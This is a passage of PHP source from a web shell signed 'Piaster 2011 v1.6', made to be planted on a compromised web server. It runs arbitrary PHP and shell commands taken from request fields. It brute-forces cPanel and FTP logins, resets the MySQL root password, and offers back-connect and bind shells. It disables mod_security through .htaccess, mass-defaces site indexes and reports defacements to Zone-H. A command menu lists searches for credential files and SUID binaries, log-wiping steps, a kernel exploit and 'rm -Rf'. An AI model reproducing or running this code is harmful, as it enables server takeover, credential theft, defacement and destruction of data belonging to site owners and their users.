556if(@fclose($han)){echo "File ".$ft1." Uploaded";}else {echo "Noop!";}
557}
558
559switch(true){
560case(oP == '7'):{ mailr_s();}break;
561case(oP == '9'):{ccf();}break;
562case(oP == '11'):{ htc();}break;
563case(oP =='12'):{zh();}break;
564case(oP =='15'):{ sear();}break;
565case (oP == '14'||isset($_REQUEST["crtty"])):{hashw();exit();}break;
566case(oPp == '3'):{rs('cfed','141','22',$st='readonly');show_users();echo "</textarea>";}break;
567
568case(oPp =='5'):{ sqlinj();}break;
569case(oPp == '6'):{ ps5s();}break;
570case(oPp == '7'):{ extr_i();}break;
571
572
573case(isset($_REQUEST["evap"])):{
574rs('cfed','141','22',$st='readonly');
575$sd = stripcslashes($_POST['evac']);
576@eval($sd);
577echo "</textarea>";}break;
578
579case(isset($_REQUEST["gotod"])):
580{
581rs('cmdm','141','22',$st='readonly');
582$path =htmlspecialchars($_POST['goto']);
583$dih = @opendir($path) or die("<br><b>Permision denied! Unable to open dir $path");
584if(wdll_chf())echo wdll_cmdf('dir');else htmlspecialchars(htmlspecialchars(wdll_updir($dih, $path)));
585echo "</textarea>";}break;
586
587case(isset($_REQUEST["finds"])):
588{$pathh =htmlspecialchars($_POST['goto']);
589$fin = htmlspecialchars($_POST['fin']);echo "Find File = ".$fin." Dir = ".$path ;
590rs('cmdm','141','22',$st='readonly');
591$dih = @opendir($pathh) or die("<br><b>Permision denied! Unable to open dir $path");
592echo wdll_nora($dih,$pathh,$fin);
593echo "</textarea>";}break;
594case (isset($_REQUEST["mvdi"])):{rs('cmdm','141','22',$st='readonly');
595$cop = true;
596$mvdir = htmlspecialchars($_POST['movd']);
597$dst = htmlspecialchars($_POST['destd']);
598if(!empty($_POST['rvm'])){$cop = false;}
599md($mvdir,$dst,$cop);echo "</textarea>";
600}break;
601
602
603case(isset($_REQUEST["gip"])):
604{echo "<br>SQL INJECTION FOUNDER<br>";
605 rs('cmdm','141','22',$st='readonly');
606 echo sqlj_do($_REQUEST["ipp"]);
607 echo "</textarea>";
608 echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;
609}break;
610case(isset($_REQUEST["gfil"]) || isset($_REQUEST['gfils'])|| isset($_REQUEST['show'])):
611{echo "<form name=\"savf\" action=\"".$php."\"method=\"post\">";
612rs('cfed','141','22');
613 if($_GET['show']) {$pos = @base64_decode(htmlspecialchars($_REQUEST['show']));
614
615 if(function_exists('file_get_contents'))
616{echo @file_get_contents($pos);}
617elseif(function_exists('file'))
618{echo @file($pos);}
619elseif(function_exists('fread')){$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);}
620else {rf();} echo "</textarea>";inp('hidden','50','goto',path);
621inp('hidden','50','svdi',$pos,'','<br>');
622sub('svff','Save',$pr='<br>');exit;}
623
624elseif(isset($_REQUEST['gfils'])){$pos = $HTTP_POST_VARS['cfils'];sqlf($pos);}
625 else {$pos = $HTTP_POST_VARS['cfil'];}
626
627switch($_REQUEST['getm']){
628case('1'):{{$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);echo $dc;}}break;
629case('2'):{echo rf();}break;
630case('3'):{if(function_exists('file_get_contents')){echo @file_get_contents($pos);}}break;}
631
632echo "</textarea>";
633inp('hidden','50','goto',path);
634inp('hidden','50','svdi',$pos,'','<br>');
635sub('svff','Save',$pr='<br>');}break;
636case(isset($_REQUEST['cmdr'])):{
637rs('cmdm','141','22',$st='readonly');
638$pos = $_POST['cmde'];
639echo wdll_cmdf($pos);
640echo "</textarea>";}break;
641case(isset($_REQUEST['aliA'])) :{
642 $alis = $_REQUEST['alI'];
643define('dir',$alis);
644echo "Command: ".$alis."<br>";
645rs('cmdm','141','22',$st='readonly');
646echo wdll_cmdf($alis);
647echo "</textarea>";}break;
648case(isset($_REQUEST['spots'])):{
649rs('cmdm','141','22',$st='readonly');
650ps();
651
652echo "</textarea>";
653echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}break;
654
655case(isset($_REQUEST['crcf'])):{if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{
656$prt=$_REQUEST['port'];
657$us=$_REQUEST['uses'];
658$pa=$_REQUEST['pass'];
659$sit=$_REQUEST['site'];
660$crt=$_REQUEST['crt'];
661if($crt == ""){echo "\nERORR: Chois Crack Type Cpanel OR FTP ?\n";
662echo "<a href=\"javascript: history.go(-1)\">Back</a>";die;}
663echo "Crack Type: ".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n";
664rs('cmds','141','22',$st='readonly');
665$us=explode("\n",$us);
666$pa=explode("\n",$pa);
667echo "Crack Type: ".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n";
668if($sit == ""){$sit = "localhost";}
669if($prt == ""){$prt = "2082";}
670foreach ($us as $u){$usr = trim($u);
671foreach ($pa as $p ){$pwd = trim($p);
672if($crt == "FTP"){echo fc($sit,$usr,$pwd,$tl);}
673if ($crt == "Cpanel"){echo cc($sit,$prt,$usr,$pwd,$tl);}}}
674echo "\n[~] Cracking Process Done!\n";
675echo "</textarea>";unset($crcf);}}break;
676
677case(isset($_REQUEST['dhtc'])):{
678$ctc = htmlspecialchars($_POST['htc']);
679$clc = htmlspecialchars($_POST['mhtc']);
680rs('cmds','141','22',$st='readonly');
681switch($_REQUEST['htcc']){
682case('ch'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
683case('cpp'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"AddType application/x-httpd-php4 .php");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
684case('cpe'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"<FileMatch '^.*\.$ctc>\r\nSetHandler application/x-httpd-php\r\n</FilesMatch>");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
685case('cre'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"Options ExecCGI\r\nAddType application/x-httpd-cgi .$ctc\r\nAddHandler cgi-script .".$ctc);if(fclose($hd)){echo "[+] Htaccess Created!";}}break;
686case('fis'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"<IfModule mode_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\n</IfModule>");if(fclose($hd)){echo "[+] Htaccess Created!";}}break;
687case('cpi'):{$hd = @fopen("php.ini","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] PHP.ini Created!";}}break;}
688
689echo "</textarea>";unset($dhtc);}break;
690case(isset($_REQUEST['zhsd'])): {rs('cmds','141','18',$st='readonly');
691if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{
692$hnam = htmlspecialchars($_POST['hname']);
693$htype = htmlspecialchars($_POST['htype']);
694$hwhy = htmlspecialchars($_POST['hwhy']);
695$hsts = htmlspecialchars($_POST['sts']);
696$hdo= explode("\n", $hsts);
697foreach ($hdo as $uu){$sitss = trim($uu);
698echo zhsr($hnam,$htype,$hwhy,$sitss);}
699}echo "</textarea>";unset($zhsd);}break;
700
701case (isset($_REQUEST["ext_si"])) : {
702 rs('cmds','141','22',$st='readonly');
703 extr_si();
704 echo "</textarea>"; echo "<br><br><a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>";ft();exit();}break;
705
706case (isset($_REQUEST['urlup'])):
707{rs('cmds','141','22',$st='readonly');
708$url = htmlspecialchars($_POST['urlf']);
709$file = htmlspecialchars($_POST['localf']);
710$pathf = htmlspecialchars($_POST['pathf']);
711if(fetchFilef($url,$pathf,$file)) {echo "[+]Uploaded file saved as ". path.'/'.$file;}else
712{echo "[+] Check the directory permissions for (must be 777)!\nor \nCheck URL!";}
713echo "</textarea>";unset($urlup);}break;
714
715case(isset($_REQUEST['crypfl'])||isset($_REQUEST['crypo'])):
716{rs('ccrt' ,'141','22',$st='');
717if(isset($_REQUEST['crypo']))
718$file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
719$meth=$_POST['crypt'];if ($meth=="1") {echo stripcslashes(md5(@fread($file,100000)));} elseif ($meth=="2") {echo stripcslashes(crypt(@fread($file,100000)));}
720elseif ($meth=="3") {echo stripcslashes(sha1(@fread($file,100000)));}
721elseif ($meth=="4") {echo stripcslashes(crc32(@fread($file,100000)));}
722elseif ($meth=="5") {echo stripcslashes(urlencode(@fread($file,100000)));}
723elseif ($meth=="6") {echo stripcslashes(urldecode(@fread($file,100000)));}
724elseif ($meth=="7") {echo stripcslashes(@base64_encode(@fread($file,100000)));}
725elseif ($meth=="8") {echo stripcslashes(@base64_decode(@fread($file,100000)));}
726echo "</textarea><div align=left>";echo '<br><form enctype="multipart/form-data" method="post"><b>File:<br><input name="userfile" type="file"><br><br><input type="submit" value="Crypt" name="crypo"><br><br><hr><input type=radio name=crypt value=1>md5();<br><hr><input type=radio name=crypt value=2>crypt();<br><hr><input type=radio name=crypt value=3>sha1();<br><hr><input type=radio name=crypt value=4>crc32();<br><hr><input type=radio name=crypt value=5>urlencode();<br><hr><input type=radio name=crypt value=6>urldecode();<br><hr><input type=radio name=crypt value=7>base64_encode();<br><hr><input type=radio name=crypt value=8>base64_decode();<br>';echo "<hr><div align =\"center\"><br><br><a href=\"javascript: history.go(-1)\">Back</a>";echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";
727exit;
728}break;
729
730case(oP == '8'):{ indexc();exit();}break;
731case(oPp == '1'):{ vbsql();exit();}break;
732case(oPp == '2'):{ backc();}break;
733case(oPp == '4' || $_REQUEST['piasS']):{
734
735
736if($win) {
737 define('STDIN',@fopen("php://stdin","r"));
738 $input = trim(@fgets(STDIN,256));
739 $input = ereg_replace('\"', "\\\"", $input);
740 $input = ereg_replace('\'', "\'", $input);
741
742 echo "| |<a href=\"".$php."\">Home</a></p>";
743 if(wdll_chf()) wdll_cmdf("net stop mysql");
744 if(wdll_chf()) wdll_cmdf('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
745 if(wdll_chf()) wdll_cmdf("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
746 if(wdll_chf()) {wdll_cmdf("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
747 echo '<br> Please wait ................................... Goodluck ...Win phpMyAdmin Hacked :: <br>USER: root & PASSWORD: piaster<br><br><br><p align="center"><a href="javascript: history.go(-1)">Back</a>';}else echo " I think function disable or Path: 'C:\AppServ\MySQL ' not found on this server edit Path..Bug only in AppServ about www.appservnetwork.com";
748 sleep(3);
749 if(wdll_chf()) wdll_cmdf("net start mysql");}
750
751if(!$win) {
752 echo '<form action="#" method="post">';
753 inp('input','20','dbu',$_REQUEST['dbu'],$ti='user',$pr='');
754 inp('input','20','dbp',$_REQUEST['dbp'],$ti='password',$pr='');
755 inp('input','20','dbh',$_REQUEST['dbh'],$ti='host',$pr='');
756 sub('piasS','GO',$pr='');
757 echo '</form>';
758
759
760if(isset($_REQUEST['piasS'])){
761
762$dbu = $_REQUEST['dbu'];
763$dbp = $_REQUEST['dbp'];
764$dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
765
766$conn = @mysql_connect($dbh, $dbu, $dbp);
767$select = @mysql_select_db('mysql', $conn);
768if (!$select) {
769echo @mysql_error();}
770
771$t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
772$go1 = @mysql_query( $t1 , $conn);
773
774if($go1){echo '<center><br>Goodluck ... Lunix phpMyAdmin Hacked :: Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster<br><br><br><p align="center"><a href="javascript: history.go(-1)">Back</a></p></center>';
775echo "| |<a href=\"".$php."\">Home</a>";}
776}}exit();}break;
777
778case(isset($_REQUEST['vbsq'])):{ vb_opt();exit();}break;
779
780case(oP == 6):{
781//echo "<hr color= #993333>";
782rs('cmds','120','20',$st='readonly');
783if(wdll_chf()){ if(!$win){echo wdll_cmdf('ls -la');}else echo wdll_cmdf('dir');}else
784{$dih = @opendir(path) or die("<br><b>Permision denied! Unable to open dir $path");
785wdll_updir($dih, path);}
786echo "</textarea>"; }break;
787default:{echo "<font color = orange>
788Hello <br>
789I hope you will find useful tool to perform your job properly<br>
790Also heal myself if your use of it in harm to people <br>
791Always remember<br>
792Easy Come Easy Go.<br>
793Piaster 2011 v1.6<br>
794";}//---------------------------------
795}
796echo " <table>";
797
798if($_REQUEST['wbp']){bbc($_REQUEST['wbcp']);}
799if($_REQUEST['lbg']){bbc($_REQUEST['lbcp']);}
800if($_REQUEST['bpg'] ){bbc($_REQUEST['bcpo'],$_REQUEST['bcip']);}
801
802echo "<br>" ;sl();
803
804echo "<br><br>";
805
806echo "<table><tr><td>";
807//echo "<hr color= #993333>";
808cm_ge(); echo "</td><td>";
809//echo "<hr color= #993333>";
810cm_gee();echo "</td></tr></table>";echo "<hr color= #993333>";
811if (oP == '13' || !empty($_POST['evac'])) {echo eva();}
812else db_lg() ;echo "<br>";urlp();echo "<hr color = #993333><br>"; movdr();
813echo "<hr color = #993333></div>";
814echo "</table>";
815function mailr_s(){
816echo "<form name=\"savf\" action=\"".$php."\"method=\"post\">";
817inp('text','30','mnam',$_REQUEST['mnam'],'Your name: ','');
818inp('text','30','mmail',$_REQUEST['mmail'],'Your e-mail: ','');
819inp('text','30','mito',$_REQUEST['mito'],'To: ','');
820inp('text','30','msubj',$_REQUEST['msubj'],'Subject: ','<br>');
821are('mmsg',$_REQUEST['mmsg'],'80','8',$st ='',$pr ='<br><br><br><br>');
822sub('mSendm','Send');}
823function sear(){
824echo "<br><br><table bgcolor=black border = 1><tr><td><form action=\"".$php."\"method=\"post\">";
825echo 'Path<br>';
826inp('text','63','serdir',path,'','<br>');
827echo '<br>';
828echo 'Search DIR<br>';
829inp('text','32','sedir','include','','<br>');
830inp('radio','10','sea','cedr','Directory only','<br>');
831echo '<br><div align = left>';
832echo '<br>Key word';
833are('searcc','','60','5',$pr ='<br>',$id='');
834echo '<br>';
835inp('radio','10','sea','cepr','Preg_Match (Regular expressions)(into file)','<br>');
836inp('radio','10','sea','cewo','words only (into file)','<br>');
837inp('radio','10','sea','cefn','File Name (same key word ex: config.php)','<br>');
838inp('radio','10','sea','cefi','File Name (include yo key word)(min char = 3)','<br>');//
839inp('radio','10','sea','cefm','File Mode (like 666 ,777 ...etc)','<br>');
840inp('radio','10','sea','ceft','File Type (like php,txt ...etc)','<br><br>');
841echo '<div align = center>';
842sub('search','Search');
843echo '</form></div></ts></tr></table>';
844echo "<br><a href=\"".$php."\">Home</a><p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}
845
846function hashw()
847{ $crtf = $_POST['crrt'];echo "<form action=\"".$php."\"method=\"post\">";
848are('crrt',stripcslashes($crtf),'80','8','<br>',$id='');echo "<br><br><br><table width = \"100\" border=1 bgcolor =\"000000\" ><tr>";echo '<td>md5:</td><td>';
849inp('text','80','cc',stripcslashes(@md5($crtf)),'','<br>');echo "</td></tr>";echo '<td>crypt:</td><td>';
850inp('text','80','cc',stripcslashes(@crypt($crtf)),'','<br>');echo "</td></tr>";echo '<td>sha1:</td><td>';
851inp('text','80','cc',stripcslashes(@sha1($crtf)),'','<br>'); echo "</td></tr>";echo '<td>crc32:</td><td>';
852inp('text','80','cc',stripcslashes(@crc32($crtf)),'','<br>'); echo "</td></tr>";echo '<td>urlencode:</td><td>';
853inp('text','80','cc',stripcslashes(@urlencode($crtf)),'','<br>'); echo "</td></tr>";echo '<td>urldecode:</td><td>';
854inp('text','80','cc',stripcslashes(@urldecode($crtf)),'','<br>');echo "</td></tr>";echo '<td>base64_encode:</td><td>';
855inp('text','80','cc',stripcslashes(@base64_encode($crtf)),'','<br>'); echo '</td>';echo "</td></tr>";echo '<td>base64_decode:</td><td>';
856inp('text','80','cc',stripcslashes(@base64_decode($_POST['crrt'])),'','<br>'); echo "</td></tr>";echo '</tr>';echo '<br><br>';
857echo '</td>';echo "</td></tr>";echo '<td>dec2hex:</td><td>';
858$c = strlen($crtf); for($i=0;$i<$c;$i++) { $hex = dechex(ord($crtf[$i])); if ($crtf[$i] == "&")
859{echo $crtf[$i];} elseif ($crtf[$i] != "\\") {echo "%".$hex;}}
860echo '</table>';
861sub('crtty','Crypt','');echo ' ';sub('crypfl','Crypt File');echo '<br><br>';
862echo "<a href=\"javascript: history.go(-1)\">Back</a></div><hr>";echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";}
863
864function extr_i(){
865echo "<form action=\"".$php."\"method=\"post\">";
866inp('text','50','sqtid','','IP/HOST:');
867sub('ext_si','Extract!','<br>');
868echo "</form>";
869}
870function indexc()
871{$xq = 'UPDATE "dbname".template name SET template name = "index code" WHERE title = "field title"';
872echo "<form action=\"".$php."\" method=\"post\">
873<div align =\"center\"><b>Index Code</b>";
874are('coded','Post your code here','50','20','<br>');
875echo '<div align=left>';
876echo "<b>File Options</b><br><hr color=black>";
877inp('text','40','masdr',path,'Path');echo ' ';inp('text','20','skid','Dir name','Skip Dir');echo "<br>";
878inp('radio','10','msi','msfi','Just indexes','<br>');
879inp('radio','10','msi','msfa','all files','<br>');
880inp('radio','10','msi','msfr','Remove all without indexes');
881echo "<hr color=black><b>DataBase options</b><br>";
882
883echo "<br>";
884inp('radio','10','msi','msvb','VB','<br>');
885inp('radio','10','msi','msbb','MyBB','<br>');
886inp('radio','10','msi','msin','Infinty','<br>');
887inp('radio','10','msi','mswp','WordPress','<br>');
888inp('radio','10','msi','msjo','Jomla','<br>');
889inp('radio','10','msi','msrd','Remove DB!','<br>');
890inp('radio','10','msi','msot','Other | index code = $coded','<br>');
891inp('text','100','msqur',$xq,'Query:');echo "<br><br>";
892inp('text','15','sqdbn',$n,'DBname:');
893inp('text','15','sqlog',$u,'DBuser:');
894inp('text','15','sqpwd',$p,'DB_PWD:');
895inp('text','13','sqsrv','localhost','HOST:');
896inp('text','13','sqprt','3306','PORT:');
897
898echo "<hr color=black><br><br><div align =\"center\">";
899sub('massa','Mass Index!','<br>');
900echo "</form>";
901echo "<a href=\"".$php."\">Home</a><br><br>";exit;}
902
903function sqlinj(){
904echo "<center>FIND SQL INJECTION ON OTHER REMOTE SERVER <BR>";
905echo "<form name=\"site\" action=\"".$php."\"method=\"post\">";
906inp('text','20','ipp','',' IP ','<br><br>');
907sub('gip',' Find SQL Inj','<br>');
908echo "</form>";
909}
910function ccf(){
911$wrdlist= "1234556 \n987654321\n963852741\n321654\n987654321\n963741\n951753\n852654\n987321\n321987951753";
912if(wdll_chf()){$userlist = wdll_cmdf('ls /var/mail');}else $userlist ="users";
913echo "<form action=\"".$php."\"method=\"post\"><br><br>";
914$loca = $_SERVER['SERVER_NAME'];
915inp('text','30','site',$loca,'HOST/IP');
916inp('text','5','port','2082','Port','<br>');
917
918if(!empty($_REQUEST['uses'])){ $userlist = $_REQUEST['uses'];}
919echo "<table><tr><td>";
920are('uses',$userlist,'10','20',$pr ='');echo "</td><td>";
921if(!empty($_REQUEST['pass'])){$wrdlist = $_REQUEST['pass'];}echo "</td><td>";
922echo "<textarea id='passw' name='pass' cols='10'rows='20' onselect='cp()' onchange='cp()' onkeydown='cp()' onkeyup='cp()' onchange='cp()'>".$wrdlist."</textarea>";
923echo "</td></tr></table>";
924echo "<br>
925<b>Password Number : <span id='pn'>0<br></span>
926<span><font color=orange><b>Split The Password List By:</font></span><br>
927<input name='textml' id='spl' type='text' value=',' size='5'/>
928<input type='button' onclick='psplit()' value='Split'>";
929echo "<br><br>";
930inp('radio','10','crt','cp','Cpanel [2082]');
931inp('radio','10','crt','FTP','FTP [21]','<br>');
932echo "<br>";
933sub('crcf','Crack');
934echo "</form>";
935echo "<br><a href=\"".$php."\">Home</a><br><br>";
936?>
937<body onload="cp">
938<script type="text/javascript">
939
940 window.onload = pchange;
941 var xy = false;
942 function psplit(){
943 var yx = document.getElementById("passw").value;
944 var yz = document.getElementById("spl").value;
945 var nora=new Array();
946 nora = yx.split(yz);
947 document.getElementById("passw").value="";
948 var i;
949 for(i=0;i<nora.length;i++){
950 document.getElementById("passw").value += nora[i]+"\n";}
951 cp();}
952 function cp(){
953 var etext = document.getElementById("passw").value;
954 var nora=new Array();
955 nora = etext.split("\n");
956 document.getElementById("pn").innerHTML=nora.length+"<br />";
957 if(!xy && nora.length > 50000){
958 alert('If passwords list More Than 50000 passwords This May Hang The Server');
959 xy = true;}}</script>
960<?php
961exit();}
962
963function backc(){
964echo "<form action=\"".$php."\"method=\"post\">";
965inp('text','20','bcip',$_SERVER['REMOTE_ADDR'],'IP:');
966inp('text','10','bcpo','1985','Port');
967sub('bpg','Connect!','<br><br>');
968echo 'Lunix Bind Port <br>';
969inp('text','10','lbcp','1985','Port');
970sub('lbg','Connect!','<br><br>');
971echo 'Win Bind Port<br>';
972inp('text','10','wbcp','1985','Port');
973sub('wbp','Connect!');
974echo "</form>";
975
976echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a><center><br></p>";}
977function urlp(){
978echo "<form action=\"".$php."\"method=\"post\">";
979inp('text','50','urlf','http://www.','URL:');
980inp('text','50','pathf',path,'Path');
981inp('text','10','localf','wdll.zip','Save as');
982sub('urlup','Upload!');
983echo "</form>";}
984
985function ps5s(){
986echo "<form action=\"".$php."\"method=\"post\">";
987inp('text','30','hot','IP/Domain');
988inp('text','8','spot','1','FROM');
989inp('text','8','epot','100','TO');
990sub('spots','Scan');
991echo "</form>";
992}
993function ch()
994{
995echo "<select name=ch>
996<option value=cm>CHMOD</option>
997<option value=co>CHOWN</option>
998<option value=cg>CHGRP</option>
999<option value=cu>Unlink</option>
1000</select>";inp('text','44','cfx',path);inp('text','8','cfy','0666');sub('chfl','Ok');}
1001
1002function movdr(){
1003echo "<form action=\"".$php."\"method=\"post\">";
1004inp('checkbox','','rvm','remov','Remove dir after copy');
1005inp('text','50','movd',path,'FROM');inp('text','47','destd',path,'TO');
1006sub('mvdi','Move');echo "</div>";
1007echo "</form>";}
1008
1009function eva()
1010{echo "<form action=\"".$php."\"method=\"post\">";
1011$valo = '//unlink G5.php';
1012are('evac',$valo,'125','5',$st ='',$pr ='<br><br><br><br>');
1013sub('evap','Run PHP Code',$pr='<br>');echo "</form>";}
1014
1015function sk_ju()
1016{inp('checkbox','50','Ski','Ski','Skip');
1017inp('checkbox','50','Jum','Jum','Jump');
1018inp('text','20','askid','uploads','DIR');}
1019
1020function cm_ge()
1021{$aliss = '';
1022$aliss = dir;
1023echo "<form method=\"POST\" action=\"".$php."\" enctype=\"multipart/form-data\">";
1024echo "<table dir =left border=1 bgcolor =\"000000\" ><tr><td>Execute</td><td>";
1025inp('text','55','cmde',$aliss,'');sub('cmdr','CMD',$pr='<br>');echo "</td></tr>";
1026echo "<tr><td> Get File</td><td>";
1027echo"<select size=\"1\" name=\"getm\" title=\"FileS Action\" >
1028
1029<option value=\"2\">Mode [0]</option>
1030<option value=\"1\">Mode [1]</option>
1031<option value=\"3\">Mode [2]</option>
1032
1033</select>";
1034if(isset($HTTP_POST_VARS['cfil']))$oop = $_POST['cfil'];else $oop = path;
1035inp('text','42','cfil',$oop,'');sub('gfil',' Get ','<br>');echo "</td></tr>";
1036
1037echo "<tr><td>Go Dir</td><td>";
1038inp('text','55','goto',path,'');sub('gotod',' Go ','<br>');echo "</td></tr>";
1039echo "<tr><td>Locate</td><td>";
1040inp('text','55','fin','config.php','');sub('find','Find');echo "</td></tr>";
1041
1042echo "<tr><td>Upload</td><td>";
1043inp('hidden','55','MAX_FILE_SIZE',$umf,'');
1044echo "<input type=\"file\" name=\"dfill\" accept=\"*/*\" size=\"36\">";
1045sub('upcom',' Up ','<br>');echo "</td></tr></table>";}
1046
1047function cm_gee()
1048{echo "<form method=\"POST\" action=\"".$php."\" >";
1049echo "<table dir =right border=1 bgcolor =\"000000\" ><tr><td>MK Dir</td><td>";
1050inp('text','55','mKd',path,'');sub('mkD',' MKD ',$pr='<br>');echo "</td></tr>";
1051echo "<tr><td>MK File</td><td>";
1052inp('text','55','mKf',path,'');sub('mkF',' MKF ','<br>');echo "</td></tr>";
1053
1054echo "<tr><td>Download</td><td>";
1055inp('text','55','dWn',path,'');sub('dWNf','down','<br>');echo "</td></tr>";
1056echo "<tr><td>File options</td><td>";
1057ch();echo "</td></tr>";
1058
1059echo "<tr><td>Execute</td><td>";
1060alias();
1061echo "</td></tr>
1062
1063</table>";}
1064
1065function zh()
1066{echo "<br><br><form action=\"".$php."\"method=\"post\">";
1067echo "Defacer?<br>";
1068inp('text','30','hname','w.dll','','<br>');
1069echo "Hacking Mode?<br><select name='htype'><option >--------SELECT--------</option><option value='1'>known vulnerability (i.e. unpatched system)</option><option value='2' >undisclosed (new) vulnerability</option><option value='3' >configuration / admin. mistake</option><option value='4' >brute force attack</option><option value='5' >social engineering</option><option value='6' >Web Server intrusion</option><option value='7' >Web Server external module intrusion</option><option value='8' >Mail Server intrusion</option><option value='9' >FTP Server intrusion</option><option value='10' >SSH Server intrusion</option><option value='11' >Telnet Server intrusion</option><option value='12' >RPC Server intrusion</option><option value='13' >Shares misconfiguration</option><option value='14' >Other Server intrusion</option><option value='15' >SQL Injection</option><option value='16' >URL Poisoning</option><option value='17' >File Inclusion</option><option value='18' >Other Web Application bug</option><option value='19' >Remote administrative panel access through bruteforcing</option><option value='20' >Remote administrative panel access through password guessing</option><option value='21' >Remote administrative panel access through social engineering</option><option value='22' >Attack against the administrator/user (password stealing/sniffing)</option><option value='23' >Access credentials through Man In the Middle attack</option><option value='24' >Remote service password guessing</option><option value='25' >Remote service password bruteforce</option><option value='26' >Rerouting after attacking the Firewall</option><option value='27' >Rerouting after attacking the Router</option><option value='28' >DNS attack through social engineering</option><option value='29' >DNS attack through cache poisoning</option><option value='30' >Not available</option></select></p>";
1070echo "Hacking Reason?<br><select name='hwhy'><option >--------SELECT--------</option><option value='1' >Heh...just for fun!</option><option value='2' >Revenge against that website</option><option value='3' >Political reasons</option><option value='4' >As a challenge</option><option value='5' >I just want to be the best defacer</option><option value='6' >Patriotism</option><option value='7' >Not available</option></select>";
1071echo "<br>";
1072are('sts',@getenv("SERVER_NAME"),'30','10',$pr ='');
1073echo '<br>';
1074sub('zhsd','Zone-H!');echo "</form>";
1075echo "<br><br><a href=\"".$php."\">Home</a><br><br>";exit;}
1076
1077function htc(){
1078echo"<br><br><br>
1079<form name=\"site\" action=\"".$php."\"method=\"post\"><select size=\"1\" name=\"htcc\" title=\"FileS Action\" ><option>Select</option><option value=\"ch\">Create htaccess</option><option value=\"cpi\">Create php.ini</option><option value=\"cpe\">Change PHP Extension </option><option value=\"cre\">Change Perl Extension</option><option value=\"cpp\">Change PHP5 to PHP4</option><option value=\"fis\">Kill(Forrbidden + Error 500)</option></select>";
1080inp('text','5','htc','wdll','TO');
1081echo '<br>';
1082are('mhtc','Code here','40','5',$pr ='');
1083sub('dhtc','Make!');
1084echo "</form><br>";
1085echo "<a href=\"javascript: history.go(-1)\">Back</a><br><br>";exit;}
1086
1087function alias()
1088{echo "<form name=\"site\" action=\"".$php."\"method=\"post\"><select size=\"1\" name=\"alI\" title=\"Find\"><option >Select</option><option >________current dir________________________</option><option value='find . -type f -perm -04000 -ls'>suid files <=</option><option value='find . -type f -perm -02000 -ls'>sgid files <=</option><option value='find . -type f -name config.php'>config.php files <=</option><option value='find . -type f -name 'config*''>config* files <=</option><option value='find . -type f -perm -2 -ls'>find all writable files <= </option><option value='find . -type d -perm -2 -ls'>find all writable directories <=</option><option value='find . -perm -2 -ls'>find all writable directories and files <=</option><option value='find . -type f -name service.pwd'>find service.pwd files <=</option><option value='find . -type f -name .htpasswd'>find .htpasswd files <=</option><option value='find . -type f -name .bash_history'>find .bash_history files <=</option><option value='find . -type f -name .mysql_history'>find .mysql_history files <=</option><option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files <=</option><option >________Out dir____________________________</option><option value='find / -type f -perm -04000 -ls'>suid files =></option><option value='find / -type f -perm -02000 -ls'>sgid files =></option><option value='find / -type f -name config.php'>config.php files =></option><option value='find / -type f -name 'config*''> config* files =></option><option value='find / -type f -perm -2 -ls'>find all writable files => </option><option value='find / -type d -perm -2 -ls'>find all writable directories =></option><option value='find / -perm -2 -ls'>find all writable directories and files => </option><option value='find / -type f -name service.pwd'>find all service.pwd files =></option><option value='find / -type f -name .htpasswd'>find all .htpasswd files =></option><option value='find / -type f -name .bash_history'>find all .bash_history files =></option><option value='find / -type f -name .mysql_history'>find all .mysql_history files =></option><option value='find / -type f -name .fetchmailrc'>'find all .fetchmailrc files =></option><option >___________________ _______________________</option><option value='lsattr -va'>list file attributes on a Linux second extended file Sys</option><option value='netstat -an '>show opened ports</option><option value='ls -la'>Show files </option><option value='dir'>Show files Win</option><option >__________Useful Commands _________________</option><OPTION VALUE='uname -a'>Kernel version<OPTION VALUE='w'>Logged in users<OPTION VALUE='lastlog'>Last to connect<OPTION VALUE='find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'>Suid bins<option VALUE='cut -d: -f1,2,3 /etc/passwd | grep ::'>Users<option VALUE='find /etc/ -type f -perm -o+w 2> /dev/null'>Write in /etc/?<option VALUE='which wget curl w3m lynx'>Downloaders?<option VALUE='cat /proc/version /proc/cpuinfo'>CPUINFO<option VALUE='netstat -atup | grep IST'>Open ports<option VALUE='locate gcc'>gcc installed?<option VALUE='rm -Rf'>Format box (DANGEROUS)<option VALUE='gcc zap2.c -o zap2'>WIPELOGS PT2<option VALUE='./zap2'>WIPELOGS PT3<option VALUE='./k3 1'>Kernel attack (Krad.c) PT2 